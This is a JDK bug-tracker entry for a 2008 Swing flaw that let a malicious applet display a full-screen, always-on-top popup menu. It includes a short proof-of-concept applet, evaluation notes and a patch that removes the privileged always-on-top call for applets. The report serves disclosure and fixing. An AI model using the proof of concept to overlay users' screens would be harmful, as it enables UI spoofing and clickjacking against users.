Bug ID: 6691503 Malicious applet can show always-on-top popup menu which has whole screen size

6691503 : Malicious applet can show always-on-top popup menu which has whole screen size

Details

Type:	Bug	Submit Date:	2008-04-21
Status:	Resolved	Updated Date:	2011-01-19
Project Name:	JDK	Resolved Date:	2008-04-30
Component:	client-libs	OS:	generic
Sub-Component:	javax.swing	CPU:	generic
Priority:	P3
Resolution:	Fixed
Affected Versions:	7
Fixed Versions:	7

Related Reports

Relates:	JDK-6580930 - Swing Popups should overlap taskbar
Relates:	JDK-6675802 - Regression: heavyweight popups cause SecurityExceptions in applets
Relates:	JDK-6694823 - A popup menu can be partially hidden under the task bar in applets

Sub Tasks

Description

There is an oversight in the fix for 6675802. It allows a malicious applet to show an always-on-top popup menu which has the whole screen size. A code example is below:
=== Source Begin ===
import javax.swing.*;
import java.awt.*;

public class MaliciousApplet extends JApplet {
    public void start() {
        JPopupMenu popupMenu = new JPopupMenu();
        popupMenu.add(new JMenuItem("Click"));

        Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize();
        popupMenu.setPopupSize(screenSize);

        popupMenu.show(null, 0, 0);
    }
}
=== Source End ===

Comments

WORK AROUND There are no workarounds.
2008-04-23
EVALUATION OK, we can always try to do setAlwaysOnTop() and catch the exception for applets. I think, it shouldn't slow down the code noticeably.
2008-04-22
SUGGESTED FIX src/share/classes/javax/swing/Popup.java @@ -227,19 +227,16 @@ setFocusableWindowState(false); setName("###overrideRedirect###"); // Popups are typically transient and most likely won't benefit // from true double buffering. Turn it off here. getRootPane().setUseTrueDoubleBuffering(false); - java.security.AccessController.doPrivileged( - new java.security.PrivilegedAction<Object>() { - public Object run() { + try { setAlwaysOnTop(true); - return null; + } catch (SecurityException se) { + // igonre } } - ); - } public void update(Graphics g) { paint(g); }
2008-04-22
EVALUATION The changes in the Popup class added by the fix for 6580930 were intended for allowing a popup menu to overlap the Windows task bar. It is important for tray icons. However, popup menus in applets don't need to overlap the task bar. Hence, setAlwaysOnTop() in the Popup class can be called only for applications, but not for applets. The fix idea is to avoid calling setAlwaysOnTop() in the Popup class for applets, but do it for standalone applications.
2008-04-21
EVALUATION In general it is not easy to determine whether one is running in the context of an applet as opposed to an application.
2008-04-21

SELECT A COUNTRY/REGION
Africa Operation Argentina Australia Austria Bahrain Bangladesh Belgium & Luxembourg Belize Bhutan Bolivia Bosnia & Herzegovina Brasil Brunei Bulgaria Cambodia Canada - English Canada - French Chile China Colombia	Costa Rica Croatia Cyprus Czech Republic Denmark Ecuador Egypt Estonia Finland France Germany Greece Guatemala Honduras Hong Kong Hungary India Indonesia Iraq Ireland	Israel Italy Japan Jordan Kazakhstan Korea Kuwait Laos Latvia Lebanon Lithuania Malaysia Maldives Malta Mexico Moldova Nepal Netherlands New Zealand Nicaragua	Norway Oman Pakistan Panama Paraguay Peru Philippines Poland Portugal Puerto Rico Qatar Romania Russia Saudi Arabia Serbia & Montenegro Singapore Slovakia Slovenia South Africa Spain	Sri Lanka Sweden Switzerland -- French Switzerland -- German Taiwan Thailand Turkey Ukraine United Arab Emirates United Kingdom United States Uruguay Venezuela Vietnam Yemen

Hardware and Software, Engineered to Work Together